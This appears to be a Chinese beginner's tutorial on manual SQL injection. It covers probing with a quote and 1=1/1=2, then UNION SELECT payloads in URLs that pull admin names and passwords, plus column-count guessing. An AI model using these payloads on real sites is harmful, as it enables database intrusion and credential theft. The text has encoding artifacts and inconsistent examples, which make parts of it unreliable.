假設的目標網站 http://www.2cto.com /info.php?articleid=123(實際不可注入)

當articleid 變量取值為123 時，我們假設一下在服務器中會有怎樣的代碼運行?

1. SELECT * /* Select 函數(shù)讀取信息*/

2. FROM infotable /* 從products 數(shù)據(jù)表中*/

3. WHERE id='123';/* false condition 滿足條件時*/

/*XXXX*/是注釋符號，當程序運行時，/**/和中間的部分計算機會自動忽略。

實際系統(tǒng)執(zhí)行的代碼是這樣的：

1. select * from infotable where id = '123';

在這里，id 的取值是通過url 取值得來的“123”，那么如果我這樣呢：

info.php?articleid=123'

后面多了一個單引號，那么比較一下系統(tǒng)原本執(zhí)行的語句有什么變化：

1. select * from infotable where id = 123;

2. select * from infotable where id = 123';

***多了一個引號，語法錯誤。

注：計算機編程得不到想要的結果，錯誤分兩種，一種是語法錯誤，一種是邏輯錯誤。后面認真閱讀你會慢慢明白區(qū)別開的，這也就是為什么判斷是否為注入點的***步要在網址后面加單引號的原因了(加單引號出錯不能確定網址為注入點，只是判斷的一個步驟而已），于是后面的1=1 和1=2 的目的也就清楚了。

1. select * from infotable where id = 123;

2. select * from infotable where id = 123 and 1 = 1;//事實上1 就是1，所以應該

返回正常頁面

3. select * from infotable where id = 123 and 1 = 2;//事實上，計算機中1 永遠也不等于2，發(fā)生邏輯錯誤，所以返回錯誤頁面。手工注入通常會使用聯(lián)合查詢函數(shù)union 下面講一下union 的用法。

union 注入的***步通常是猜字段數(shù)。假設注入點是新聞頁面，那么頁面中執(zhí)行的SQL 語句就是：

1. select title,date,author,news,comm from news where id = 12;

當你進行union 注入的時候，union 前面的語句和union 后面的語句，都是一個完整的SQL

語句，是可以單獨執(zhí)行的語句

但是，必須保證前后的字段數(shù)相同，例如上面這個語句

1. select title,date,author,news,comm from news where id = 12;

2. select title,date,author,news,comm from news where id = 12 union select

name,password,3,4,5 from admin;

3. //news 是新聞表段，admin 是管理員信息表段

4. //管理員信息表段明顯沒有union 前面news 表段里面包含的字段數(shù)多所以使用數(shù)字3 到5 替代，數(shù)字無固定格式，可以使1 2 和3，也可以是111111 和4435435或者干脆用null 空來代替。

所以，上面的注入語句在實際中就是這么構造：

1. info.php?id=12+union+select+name,password,3,4,5+from+admin

2. //SQL 注入中，加號用來代表空格的意思，因為有些瀏覽器會自動將空格轉換成%20，

如果union 前面是5 個，而union 后面不是5 個，則會發(fā)生邏輯錯誤，顯示錯誤頁面。

由于程序員編寫的程序我們并不知道他在數(shù)據(jù)庫中設置了幾個字段，所以通常我們都是先進行字段數(shù)的猜測，也就是：

1. info.php?id=12+union+select+1

2. info.php?id=12+union+select+1,2

3. info.php?id=12+union+select+1,2,3

4. info.php?id=12+union+select+1,2,3,4

5. info.php?id=12+union+select+1,2,3,4,5

6. //你也可以用order by 來猜，用法可以自己搜一下

一直這樣猜到正確頁面出來，沒有了邏輯錯誤，也就表示字段數(shù)一致了，然后……后面……

這里僅僅提供思路。